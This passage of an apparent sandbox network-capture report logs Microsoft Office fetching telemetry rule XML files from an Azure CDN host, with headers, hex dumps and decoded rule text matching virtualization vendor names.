                                                                        2024-12-03 16:50:54 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        82192.168.2.44983813.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:53 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:54 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:53 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 407
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                        ETag: "0x8DC582B9D30478D"
                                                                        x-ms-request-id: b6cdcd34-001e-0014-02c7-435151000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165053Z-174f7845968cdxdrhC1EWRg0en000000162g00000000rz83
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:54 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        83192.168.2.44984013.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:53 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:54 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:53 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 408
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                        ETag: "0x8DC582BB9B6040B"
                                                                        x-ms-request-id: dcd7ccea-901e-005b-7bbf-432005000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165053Z-174f7845968vqt9xhC1EWRgten00000016ag000000004bt5
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:54 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        84192.168.2.44984213.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:53 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:54 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:54 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 416
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                        ETag: "0x8DC582BB5284CCE"
                                                                        x-ms-request-id: f7ef784b-001e-0066-274f-44561e000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165054Z-174f78459685726chC1EWRsnbg000000169g00000000984e
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:54 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        85192.168.2.44984413.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:55 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:56 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:56 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 432
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                        ETag: "0x8DC582BAABA2A10"
                                                                        x-ms-request-id: da27d7c4-b01e-005c-4391-3f4c66000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165056Z-174f7845968kvnqxhC1EWRmf3g0000000swg00000000v9vm
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:56 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        86192.168.2.44984513.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:55 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:56 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:56 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 475
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                        ETag: "0x8DC582BBA740822"
                                                                        x-ms-request-id: 07bbe555-e01e-0020-3c1f-45de90000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165056Z-174f7845968j6t2phC1EWRcfe800000016dg000000006a9q
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:56 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        87192.168.2.44984313.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:55 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:56 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:56 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 472
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                        ETag: "0x8DC582B91EAD002"
                                                                        x-ms-request-id: 18a648ed-001e-0049-1ef9-445bd5000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165056Z-174f7845968cs2nkhC1EWR2tq000000001z0000000003pws
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:56 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        88192.168.2.44984613.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:56 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:56 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:56 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 427
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                        ETag: "0x8DC582BB464F255"
                                                                        x-ms-request-id: 6ad3d079-601e-005c-2713-42f06f000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165056Z-174f7845968pf68xhC1EWRr4h800000016c000000000qh0q
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:56 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        89192.168.2.44984713.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:56 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:56 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:56 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 474
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                        ETag: "0x8DC582BA4037B0D"
                                                                        x-ms-request-id: e8c8f6d8-301e-0052-3262-4365d6000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165056Z-174f7845968jrjrxhC1EWRmmrs00000016dg000000004gz6
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:56 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        90192.168.2.44984813.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:58 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:58 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:58 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 419
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                        ETag: "0x8DC582BA6CF78C8"
                                                                        x-ms-request-id: 774b57f8-e01e-001f-60f8-441633000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165058Z-174f7845968nxc96hC1EWRspw8000000161g00000000278y
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:58 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        91192.168.2.44985013.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:58 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:58 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:58 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 405
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                        ETag: "0x8DC582B942B6AFF"
                                                                        x-ms-request-id: 9135d871-d01e-00a1-3102-4535b1000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165058Z-174f7845968cs2nkhC1EWR2tq000000001y0000000007dkm
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:58 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        92192.168.2.44984913.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:58 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:58 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:58 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 472
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                        ETag: "0x8DC582B984BF177"
                                                                        x-ms-request-id: 3bad3b8c-e01e-001f-0534-411633000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165058Z-174f7845968zgtf6hC1EWRqd8s0000000z1g00000000v4c1
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
